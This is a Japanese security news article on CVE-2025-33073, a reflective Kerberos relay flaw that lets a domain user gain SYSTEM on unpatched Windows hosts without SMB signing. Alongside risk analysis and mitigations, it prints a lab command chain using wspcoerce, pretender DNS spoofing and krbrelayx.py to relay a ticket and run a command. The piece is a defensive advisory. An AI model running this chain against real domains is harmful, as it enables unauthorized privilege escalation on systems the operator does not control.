Windows SMB Client Zero-Day Vulnerability Exploited via Reflective Kerberos Relay Attack
2025/06/12 gbhackers — 新たに公開された “Reflective Kerberos Relay Attack” と呼ばれる脆弱性 CVE-2025-33073 により、Windows のセキュリティ状況が揺らいでいる。この脆弱性は、 RedTeam Pentesting により発見され、Microsoft が2025年6月10日の Patch Tuesday で修正プログラムを公開したものだ。この脆弱性により、SMB 署名を強制しないドメイン参加 Windows システムにおいて、低権限の Active Directory ユーザーが、NT AUTHORITY\SYSTEM へと権限を昇格できることが判明した。
この攻撃では、いくつかの高度な手法が活用されている:
- 認証の強制:wspcoerce や NetExec などのツールを用いる攻撃者は、Windows ホスト (例:client1) に対して、攻撃者が制御する悪意の SMB サーバへの認証を強制する。それは、RPC API を介して実行され、ターゲットにアウトバウンド SMB 接続を強制的に開始させるものだ。
- Service Principal Name (SPN) コンヒュージョン:攻撃者は、特別に細工したホスト名 (例:client11UWhRCA…YBAAAA) の Active Directory DNS への登録、もしくは、pretender などのツールによるローカルでの名前解決の偽装を実行する。それにより、発行された Kerberos チケットが、攻撃者のシステムではなく、被害者のホストを対象にすることが保証される。
- Kerberos チケット・リレー:攻撃者は Kerberos サービス・チケットを取得し、パッチ適用版の krbrelayx.py を用いてオリジナルのホストへとリレーする。その際には、SPN cifs/client1 のコンピューター・アカウント (例:client1$) として認証する。
- 権限昇格:驚くべきことに、このリレーされた認証により、低権限のセッションではなく、SYSTEM レベルのアクセスが許可されるため、攻撃者は whoami などの任意のコマンドを実行し、そのレスポンスとして “ntauthority\system” を受け取ることが可能になる。
攻撃コマンドの例:
bash# Coerce authentication
$ wspcoerce 'lab.redteam/user1:Password@client1.lab.redteam' \
file:////client11UWhRCAAAA...YBAAAA/path
# Spoof DNS to redirect authentication
$ sudo pretender -i eth1 --no-dhcp-dns --no-timestamps \
--spoof '*1UWhRCAAAA...YBAAAA*'
# Relay Kerberos ticket and execute command
$ krbrelayx.py --target smb://client1.lab.redteam -c whoami
結果:標的マシン上で SYSTEM 権限が取得される。
技術分析と悪用の詳細
この脆弱性は、Kerberos における保護機能の脆弱性を悪用するものだ。
NTLMリレー攻撃は、2008年に MS08-068 により軽減されたが、Kerberos には、同様の保護機能が実装されていなかった。
この攻撃は、Windows のループバック認証と SPN 解決の処理を悪用し、システムを混乱させ、本来であれば付与されるべきでない権限を、付与してしまうものである。
主要な技術的要素は、以下のとおりである:
- CredUnmarshalTargetInfo/CREDENTIAL_TARGET_INFORMATIONW トリック:James Forshaw が開発した、この手法により、攻撃者は SPN から強制型変換対象を切り離すことが可能となる。その結果として、攻撃者のホストに接続している場合であっても、被害者に対して Kerberos チケットが発行されてしまう。
- NTLM 優先順位付けのバイパス:攻撃者は、krbrelayx を改変して NTLM を無効化し、Kerberos 認証を強制できる。
- トークン再利用の脆弱性:Windows は、コンピューター・アカウントの認証時に SYSTEM トークンを誤って再利用し、権限昇格を引き起こす。
リスク評価と軽減策
きわめて重大なリスクが生じている。SMB 署名が強制されていない、パッチ未適用のドメイン参加済み Windows ホストでは、ドメイン・ユーザーに対して、SYSTEM権限の取得を許す可能性がある。
この攻撃は、2025年2月24日までの、すべてのサポート対象 Windows 10/11 および Server バージョンに影響を及ぼす。ただし、SMB 署名がデフォルトで強制される、ドメイン・コントローラーだけは除外される。
リスク要因表
| Factor | Risk Level | Notes |
|---|---|---|
| Privilege Escalation | Critical | SYSTEM-level access, full remote code execution possible |
| Affected Systems | High | All domain-joined Windows 10, 11, Server 2019–2025 (excluding DCs with SMB signing) |
| Exploitation Complexity | Moderate | Requires domain access and ability to coerce authentication |
| Default Mitigations | Low | SMB signing not enforced by default on most clients and servers |
| Patch Availability | High | Patch released June 10, 2025 (apply immediately) |
| Attack Prerequisites | Moderate | Attacker must be a domain user and able to register or spoof DNS hostnames |
緩和策:
- Microsoft の 2025年6月 Patch Tuesday のセキュリティ更新プログラムを速やかに適用する。
- ドメイン・コントローラーだけでなく、すべての Windows ホストで SMB 署名を強制する。
- 異常な SMB 接続と強制認証の試みを監視する。
- Active Directory DNS で不審なホスト名を確認する。
この反射型 Kerberos リレー攻撃が浮き彫りにするのは、レガシー・プロトコルが段階的に廃止される流れの中でも、多層的なセキュリティと警戒体制の継続的な必要性である。
ユーザー組織は、この重大な脅威に対して、迅速にパッチを適用し、環境を強化する必要がある。
Kerberos による SYSTEM 権限奪取という、今回の新しい攻撃手法が登場したようです。NTLMリレー対策は進んていますが、Kerberos には盲点が残っていたのですね。SMB 署名の強制といった基本的な設定は、どれだけ徹底されているのでしょうかね?よろしければ、Kerberos で検索も、ご参照ください。
IoT OT Security News 
You must be logged in to post a comment.